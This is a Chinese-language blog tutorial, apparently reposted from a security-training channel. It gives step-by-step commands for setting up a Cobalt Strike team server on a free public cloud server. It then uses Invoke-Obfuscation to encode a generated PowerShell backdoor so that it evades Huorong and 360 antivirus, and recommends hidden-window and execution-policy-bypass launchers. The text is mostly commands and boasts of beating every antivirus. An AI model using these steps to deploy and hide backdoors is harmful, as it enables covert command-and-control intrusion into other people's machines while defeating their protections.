CS 公網配置及 Invoke-Obfuscation Bypass [火絨&360]

前言

今天本來想做個PS1的免殺，但做的時候要用到cobaltstrike來生成ps1后門

剛開始的時候并不知道cobaltstrike是一個用于團隊項目的工具，所以過程中出現了很多問題。

為了讓大家熟悉cobaltstrike的運行流程

感覺還是很有必要寫一篇有關cobaltstrike公網配置的文章。

順便講一下一個很不錯的免殺腳本

新版本的CS要配合linux服務端才能運行起來。

網上講CS4.0的文章很多，但是講的都很不盡人意，都是私人內網使用的介紹，并沒有在公網上實現完整的運行流程。

很多小白（像我似的死活不肯買服務器，映射派作風），因為映射很便宜嘛。所以思路習慣固化在映射上，什么監聽配置首先都往內網映射上想。

當然，如果你告訴我你想用花生殼是來搞cobaltstrike！

勸你還是早早放棄。(原因不想多解釋 你們能搞出來說明你們NB)

所以我也是拿出半天的時間，進行了一下從零開始如何使用服務器的相關操作。

當然啦！作為資深白嫖黨買服務器是不可能的 這輩子都不可能的~

就算抓一臺linux也不舍得買 哈哈哈哈(開個小玩笑o(￣▽￣)o)

本著白嫖到底的原則，發現騰訊云可以白嫖一臺linux的服務器。

大家可以自己去看一下：關注公眾號后 就會送你臺服務器（很香的呦~）

騰訊云利用ssh協議可以直接登錄到終端，賬號root 密碼:在郵箱里

登陸后在終端進行CS的配置：

一.安裝JAVA

訪問：https://www.oracle.com/java/technologies/j...

下載X64壓縮包

jdk-8u202-linux-x64.tar.gz

將壓縮包放到phpstudy本地WWW文件夾中(我是開的映射phpstudy)

切記不要直接wget下載地址!!!否則無法運行CS

然后服務器終端運行指令：

wget 映射的公網IP/jdk-8u202-linux-x64.tar.gz

2. 解壓縮文件并移動至/opt

1. tar -xzvf jdk-8u271-linux-x64.tar.gz

2. mv jdk1.8.0_202 /opt

3. cd /opt/jdk1.8.0_202

3. 設置環境變量

執行 vim ~/.bashrc ， 按”i”并添加下列內容

1. # install JAVA JDK

2. export JAVA_HOME=/opt/jdk1.8.0_202

3. export CLASSPATH=.:${JAVA_HOME}/lib

4. export PATH=${JAVA_HOME}/bin:$PATH

保存退出 按ESC后再shift+: 輸入wq

4. 安裝并注冊

執行：

1. update-alternatives --install /usr/bin/java java /opt/jdk1.8.0_202/bin/java 1

2. update-alternatives --install /usr/bin/javac javac /opt/jdk1.8.0_202/bin/javac 1

3. update-alternatives --set java /opt/jdk1.8.0_202/bin/java

4. update-alternatives --set javac /opt/jdk1.8.0_202/bin/javac

查看結果：

復制代碼

1. update-alternatives --config java

2. update-alternatives --config javac

二.安裝cobaltstrike

依然是wget訪問本地phpstudy映射到公網的IP下載

1. wget xxx.cc/cs4.zip

2. mkdir cs4 //創建一個文件夾

3. mv cs4.zip cs4

4. cd cs4

5. unzip cs4.zip //解壓密碼cs4

6. chmod a+x teamserver //貌似服務器終端上不需要提權

7. ln -s /opt/jdk1.8.0_202/bin/keytool /usr/bin //這一步需要加軟鏈接 很關鍵

8. ./teamserver 公網IP CS密碼

服務端就上線了！

客戶端：

windows下直接雙擊start.bat //記得安裝JAVA 要不然打不開

linux下啟動客戶端：java -XX:+AggressiveHeap -XX:+UseParallelGC -jar cobaltstrike.jar

設置監聽：

映射是死活設置不出來的！！！

生成Payload:

Invoke-Obfuscation免殺

這個不得不提，因為他實在是太好用了！一直過一切殺軟！！！

管理權限運行：Set-ExecutionPolicy Unrestricted

1. Import-Module./Invoke-Obfuscation.psd1

2. Invoke-Obfuscation

1. set scriptpath C:\Users\Administrator\Desktop\1.ps1

2. encoding

3. 1

輸出文件

out shell.ps1

測試免殺效果

完美繞過火絨和360全家桶 就問你舒不舒服？

測試payload穩定性：

以學院靶場為例 穩定運行

Invoke-Obfuscation免殺拓展：

Invoke-Obfuscation免殺有多種編碼格式 當然也有多種運行方式

輸入launcher

選擇ps

我們可以看到有多種運行方式

1. [*]啟動程序\PS\0無執行標志

2. [*]啟動器\PS\1-NoExit

3. [*]啟動器\PS\2-非交互

4. [*]啟動器\PS\3-NoLogo

5. [*]啟動程序\PS\4-NoProfile

6. [*]啟動器\PS\5-命令

7. [*]啟動器\PS\6-窗口樣式隱藏

8. [*]啟動器\PS\7-繞過執行策略

9. [*]啟動器\PS\8-Wow64（到路徑32位父進程)

10. 選擇6,7實現隱藏和繞過執行策略執行效果很不錯的呦！

11. 更多操作等你們發現~

原創：https://mp.weixin.qq.com/s/AX8-1_Lnx1zefsr...

原文鏈接：aj545302905 掌控安全EDU